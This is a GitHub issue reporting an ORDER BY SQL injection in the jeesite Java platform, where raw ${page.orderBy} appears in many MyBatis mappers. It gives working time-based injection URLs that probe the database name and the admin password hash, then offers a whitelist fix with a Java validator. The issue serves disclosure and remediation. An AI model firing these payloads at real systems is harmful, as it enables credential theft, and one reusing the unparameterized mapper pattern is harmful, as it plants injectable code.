thinkgem / jeesite

Java rapid development platform based on Spring Boot, Spring MVC, Apache Shiro, MyBatis, Beetl, Bootstrap and AdminLTE, with online code generation. Modules include organization, roles and users, menu and button authorization, data permissions, system parameters, content management and workflow. Loosely coupled design; one-click skin switching; account security settings and password policies; online scheduled task configuration; cluster and SaaS support; multiple data source support.

Home Page:http://jeesite.com


mybatis orderby sql injection

maybe-why-not opened this issue · comments

sql mappings

jeesite\src\main\resources\templates\modules\gen\dao\mapper.xml:
  106  		<choose>
  107  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
  108: 				ORDER BY ${"$"}{page.orderBy}
  109  			</when>
  110  			<otherwise>
  ...
  132  		<choose>
  133  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
  134: 				ORDER BY ${"$"}{page.orderBy}
  135  			</when>
  136  			<otherwise>

jeesite\src\main\resources\mappings\modules\sys\UserDao.xml:
  188  		<choose>
  189  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
  190: 				ORDER BY ${page.orderBy}
  191  			</when>
  192  			<otherwise>

jeesite\src\main\resources\mappings\modules\gen\GenTableDao.xml:
   45  		<choose>
   46  			<when test="page.orderBy != null and page.orderBy != ''">
   47: 				ORDER BY ${page.orderBy}
   48  			</when>
   49  			<otherwise>
   ..
   60  		<choose>
   61  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   62: 				ORDER BY ${page.orderBy}
   63  			</when>
   64  			<otherwise>

jeesite\src\main\resources\mappings\modules\cms\ArticleDao.xml:
   80  		<choose>
   81  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   82: 				ORDER BY ${page.orderBy}
   83  			</when>
   84  			<otherwise>
   ..
   98  		<choose>
   99  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
  100: 				ORDER BY ${page.orderBy}
  101  			</when>
  102  			<otherwise>

jeesite\src\main\resources\mappings\modules\cms\CategoryDao.xml:
   90  		<choose>
   91  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   92: 				ORDER BY ${page.orderBy}
   93  			</when>
   94  			<otherwise>

jeesite\src\main\resources\mappings\modules\cms\CommentDao.xml:
   44  		<choose>
   45  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   46: 				ORDER BY ${page.orderBy}
   47  			</when>
   48  			<otherwise>
   ..
   62  		<choose>
   63  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   64: 				ORDER BY ${page.orderBy}
   65  			</when>
   66  			<otherwise>

jeesite\src\main\resources\mappings\modules\cms\GuestbookDao.xml:
   42  		<choose>
   43  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   44: 				ORDER BY ${page.orderBy}
   45  			</when>
   46  			<otherwise>
   ..
   60  		<choose>
   61  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   62: 				ORDER BY ${page.orderBy}
   63  			</when>
   64  			<otherwise>

jeesite\src\main\resources\mappings\modules\cms\LinkDao.xml:
   51  		<choose>
   52  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   53: 				ORDER BY ${page.orderBy}
   54  			</when>
   55  			<otherwise>
   ..
   69  		<choose>
   70  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   71: 				ORDER BY ${page.orderBy}
   72  			</when>
   73  			<otherwise>

jeesite\src\main\resources\mappings\modules\cms\SiteDao.xml:
   49  		<choose>
   50  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   51: 				ORDER BY ${page.orderBy}
   52  			</when>
   53  			<otherwise>
   ..
   67  		<choose>
   68  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   69: 				ORDER BY ${page.orderBy}
   70  			</when>
   71  			<otherwise>

jeesite\src\main\resources\mappings\jeesite\test\TestDataChildDao.xml:
   46  		<choose>
   47  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   48: 				ORDER BY ${page.orderBy}
   49  			</when>
   50  			<otherwise>
   ..
   64  		<choose>
   65  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   66: 				ORDER BY ${page.orderBy}
   67  			</when>
   68  			<otherwise>

jeesite\src\main\resources\mappings\jeesite\test\TestDataDao.xml:
   67  		<choose>
   68  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   69: 				ORDER BY ${page.orderBy}
   70  			</when>
   71  			<otherwise>
   ..
   85  		<choose>
   86  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   87: 				ORDER BY ${page.orderBy}
   88  			</when>
   89  			<otherwise>

jeesite\src\main\resources\mappings\jeesite\test\TestDataMainDao.xml:
   58  		<choose>
   59  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   60: 				ORDER BY ${page.orderBy}
   61  			</when>
   62  			<otherwise>
   ..
   76  		<choose>
   77  			<when test="page !=null and page.orderBy != null and page.orderBy != ''">
   78: 				ORDER BY ${page.orderBy}
   79  			</when>
   80  			<otherwise>

RequestMapping

sys/user/list
gen/genTable/list
gen/genTable/form
gen/genTable/save
gen/genScheme/form
gen/genScheme/save
...

time-based SQL injection

url:http://192.168.163.1:8088/jeesite_war/a/sys/user/list?orderBy=if(database()!=0x6a656573697465,1,sleep(0.3))
admin's password
url:http://192.168.163.1:8088/jeesite_war/a/sys/user/list?orderBy=if(cu.password!=0x3032613366303737326663636139663431356164633939303733346234356336663035396337643333656532383336326334383532303332,1,sleep(3))&pageSize=1&id=1

Fix suggestion

It is suggested that the filtering rule for orderBy be written separately from the general filtering: use a whitelist for orderBy, [a-z0-9_], and a blacklist for the general filtering.
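An added example, not part of this issue or of the jeesite code base, of the whitelist approach suggested above as a standalone Java validator. It goes slightly beyond the `[a-z0-9_]` rule by also allowing an `alias.column` form and an ASC/DESC direction, since the mappers listed above sort on aliased columns; the `cu.`/`a.` sample inputs are constructed, and the caller is assumed to pass the returned value into the page's orderBy instead of the raw request parameter.

```java
import java.util.Locale;
import java.util.regex.Pattern;

/** Whitelist validator for a user-supplied ORDER BY fragment (added example). */
public final class OrderByWhitelist {
    // One sort key: identifier or alias.identifier, optional ASC/DESC, case-insensitive.
    // Anything outside [a-z0-9_.] plus the two keywords is rejected, so no
    // parentheses, commas-within-keys, quotes or function calls can get through.
    private static final Pattern SORT_KEY = Pattern.compile(
        "^[a-z_][a-z0-9_]*(\\.[a-z_][a-z0-9_]*)?(\\s+(asc|desc))?$",
        Pattern.CASE_INSENSITIVE);
    private static final int MAX_KEYS = 5;

    private OrderByWhitelist() {}

    /** Returns a normalized ORDER BY fragment, or null if any part fails the whitelist. */
    public static String sanitize(String orderBy) {
        if (orderBy == null || orderBy.trim().isEmpty()) return null;
        String[] keys = orderBy.split(",", -1);
        if (keys.length > MAX_KEYS) return null;
        StringBuilder out = new StringBuilder();
        for (String raw : keys) {
            String key = raw.trim().replaceAll("\\s+", " ");
            if (!SORT_KEY.matcher(key).matches()) return null; // reject the whole value
            if (out.length() > 0) out.append(", ");
            out.append(key.toLowerCase(Locale.ROOT));
        }
        return out.toString();
    }

    // Caller side (assumed): only a non-null result is handed to page.setOrderBy(...)
    public static void main(String[] args) {
        String[] samples = {
            "cu.login_name desc",            // legitimate single key
            "a.update_date DESC, a.name",    // legitimate multi-key
            "if(1=1,1,sleep(3))",            // constructed injection attempt, rejected
            "name; drop table sys_user",     // rejected
        };
        for (String s : samples) {
            String ok = sanitize(s);
            System.out.println(s + " -> " + (ok == null ? "REJECTED" : ok));
        }
    }
}
```

Rejecting the whole value rather than stripping offending characters avoids a partially "cleaned" fragment that still changes the query's meaning.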